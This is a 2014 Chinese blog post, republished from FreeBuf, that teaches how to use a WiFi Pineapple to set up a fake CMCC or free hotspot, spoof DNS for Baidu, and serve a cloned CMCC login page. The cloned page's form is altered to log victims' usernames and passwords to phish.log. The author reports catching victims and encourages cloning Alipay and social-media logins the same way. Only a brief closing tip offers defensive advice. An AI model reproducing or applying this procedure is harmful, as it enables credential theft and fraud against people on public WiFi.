玩转WiFi Pineapple之看我如何优雅的盗取CMCC账号

感谢趋势科技的欣姐给我寄了一个Pineapple,于是就自己摸索开始玩了起来,国内pineapple的资料不太多,于是去国外论坛去逛逛,渣渣英语不好看着甚是不舒服,算了自己来鼓捣吧。

准备:

WiFi Pineapple Mark IV 一个

网线一根 PuTTY:远程登录到pineapple的工具 WinSCP:用于拷贝文件到pineapple中

目的:

其他pineapple的玩法论坛早已经有大牛发过文章,有兴趣的童鞋自己去找一下。

今天我给大家分享的是DNS劫持,和利用DNS+克隆登录界面劫持盗取cmcc账号,这只其中的一种玩法,可以同理去克隆一个支付宝登录界面和其他社交账号神马的。

过程:

开始吧,首先配置pineapple:web UI登录地址http://172.16.42.1:1471

用户名:root 密码:pineapplesareyummy

登录后改一下默认密码,不然被人发现反被暴菊就不好玩了,当然默认端口也可以改登录以后我们可以看到pineapple的UI界面我们今天所用到的是services栏目里的DNS Spoof功能,DNSSpoof作为Dsniff工具包的其中一个程序,可以用来作为DNS欺骗之用,使得访问WiFiPineApple的用户可以访问你重新设置DNS,默认是关闭的,点击start打开。

下一步我们配置pineapple,选择上面栏的Configuration 选项,然后修改pineapple的SSID在这里我们因环境而变如果再学校可以改为CMCC,在麦当劳可以改为McDonald's 其他环境可以改为FREEWIFI等。改后点击change SSID 默认是临时的,如果想重启后还可以继续使用的话就选中Persistent选项框。然后到最关键的一步,设置DNS Spoof Config那里将example.com 改为要欺骗的网址,我这里设置百度,因为好多人默认首页就是百度,也可以改为其他。然后Updata Spoofhost,pineapple配置完成。

下一步我们来配置pineapple内的文件,PuTTY连接上pineapple,ip是172.16.42.1,账号密码如果没有改的话就是默认登录那个连接上后首先(一下过程给没有linux基础的童鞋看,大牛略过)

pw
cd ../ls
cd www
vim redirect.php
<?php
$ref = "http://".$_SERVER[&#039;HTTP_HOST&#039;].$_SERVER[&#039;REQUEST_URI&#039;];  
if (strpos($ref, "example")){ 
    header(&#039;Status: 302 Found&#039;);
    header(&#039;Location: example.html&#039;);
}
require(&#039;error.php&#039;);
?>

将example 改为baidu 将example.html改为baidu.html,然后保存退出(不会vim的自己百度一下)

cd ../mkdir web
cd web
touch baidu.html
vim baidu.html

html里的内容就可以自由发挥啦。修改后保存退出,创建一个虚拟连接

cd ../cd www
ln -s /web/* /www/
ls -al

然后就可以开始DNSspoof啦,当别人连接如你伪造的免费wifi热点时,打开百度的效果如下:

下面开始我们的邪恶计划,盗取cmcc账号,其实你只要上面的可以弄对,那么下面的也差不多是一样的。首先用电脑连接cmcc,然后打开浏览器等到跳出登陆界面时,在浏览器中将网页文件保存,保存后得到一个cmcc.html和一个cmcc_file的文件夹其实最主要的是input.html那个文件夹,只要对源码稍加改造就ok啦。我们将cmcc_file文件用WinSCP上传到pineapple的web文件夹中然后按照上面的步骤修改redirect.php 改为input.html ,之后我们对input.html进行改造,找到关键的地方。

<FORM name="staticlogin" id="staticloginid" onsubmit="return checkField(this)" 
      action="error.php" method="post">
      <DIV>
      <DIV class="loginlinput">
      <DIV class="loginlt">用户名</DIV>
      <DIV class="linput"><INPUT name="name" class="linputb" id="staticusernameid" 
      type="text" maxlength="20" value="15111401355"></DIV></DIV>
      <DIV class="loginlinput">
      <DIV class="loginlt">密 码</DIV>
      <DIV class="linput">
          <INPUT name="pass" class="linputb" id="spid" type="text" value="输入固定密码/动态密码">          
          <INPUT name="pass" class="linputb" id="staticpasswordid" style="display: none;" type="password" maxlength="16">
      </DIV>
      <DIV class="lostpassword">
      <!-- <a href="javascript:void(0)" id="lostpassword" onclick="modify_passwd()">忘记密码?</a>-->
      <A id="applyautopwd" onclick="apply_autopwd()" href="javascript:void(0)">获取动态密码</A>
      </DIV>
</DIV>

1.将<FORM name="staticlogin" id="staticloginid" onsubmit="return checkField(this)" action="error.php" method="post">里的action=""改为action="error.php"

2.将用户名下面的<INPUT name="name" class="linputb" id="staticusernameid" type="text" maxlength="20" value="15111401355"> 中的name=""改为name="name"

3.将用户名下面的<INPUT name="pass" class="linputb" id="spid" type="text" value="输入固定密码/动态密码">里的 name=" "改为name="pass"

保存后就可以欺骗了,效果如下:

只要登录以后账号密码就会被记录到/pineapple/logs/phish.log中,当然也可以在web界面上面栏目中的logs中。

才一会就有鱼儿上钩了,其他账号的盗取同理,大家自由发挥吧。

后记:

现在大家部分人对免费的wifi有一一定的警惕性,但是类似于CMCC这种移动的热点大家就会放松警惕,假如我再发挥一下在pineapple载一个3G网卡,就完全可以欺骗你,当你以为连接上了CMCC放心的购物时,你的支付宝密码就在不知不觉中不见鸟,所以别人的wifi慎用就是是CMCC,支付时候最好切换gprs流量吧。

文章中有不准确的地方请给我提出,谢谢给位。

博客地址:www.azone.asia

微博 求互粉 O(∩_∩)O~

原文发布于微信公众号 - FreeBuf(freebuf)

原文发表时间:2014-05-28

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏信安之路

wifi 杀手

在网络的世界里我们每天都能够体验飞一样速度的网络,但是总是有一些人不怀好意让一些正常的网络出现异常比如使用 DOS DDOS 进行攻击利用合理的服务请求来占用过...

39200
来自专栏醉程序

无线路由器实现校园网锐捷登陆并建立WIFI热点

52740
来自专栏编程一生

《两地书》--Kubernetes(K8s)基础知识(docker容器技术)

20640
来自专栏FreeBuf

DNS污染事件跟踪:为什么.cn和.org域名逃过一劫

关于中国境内用户访问.com 和.net 域名被解析到65.49.2.178 一事我又有新发现,我发现了为什么.cn 和.org 的域名没有受到影响指向65.4...

79060
来自专栏数据和云

DBA生存警示:误关闭生产库案例及防范建议

编辑手记:对于资深的老DBA们,他们在漫长的职业生涯中养成了很多稀奇古怪的守则,以在复杂多变的环境中“幸存”,这源于无数血泪的教训,我曾经在《数据安全警示录》...

35170
来自专栏FreeBuf

看我如何利用打印机窃取目标系统哈希值

背景 这是我今年早些时候接手的一个渗透测试项目,我要做的是获取到目标系统的控制权限。但在后渗透测试阶段,我仅仅只发现了一台与目标内网无任何关联的计算机,这也使我...

22180
来自专栏FreeBuf

利用企业邮件系统构造命令控制(C&C)和数据窃取(Exfiltration)通道的思路探讨

本文通过对高度安全环境中,渗透入侵完成后,传统的基于Web和DNS管理控制目标系统不可行条件下,利用企业网页邮箱系统进行命令控制(C&C)和数据窃取(Exfil...

237100
来自专栏安恒信息

安全研究员发现了多个IP地址利用已修复的PHP漏洞劫持Linux服务器

华盛顿大学的安全研究员Andre'DiMino注意到了多个IP地址试图利用一个已修复PHP漏洞劫持Linux服务器,他很好奇攻击者如何成功控制一台Linux服务...

385120
来自专栏一场梦

初涉网络安全技术,这些专业术语你知道多少?

35520
来自专栏编程一生

《两地书》--Kubernetes(K8s)基础知识(docker容器技术)

  大家都知道历史上有段佳话叫“司马相如和卓文君”。“皑如山上雪,皎若云间月”。卓文君这么美,却也抵不过多情女儿薄情郎。

25040

扫码关注云+社区

领取腾讯云代金券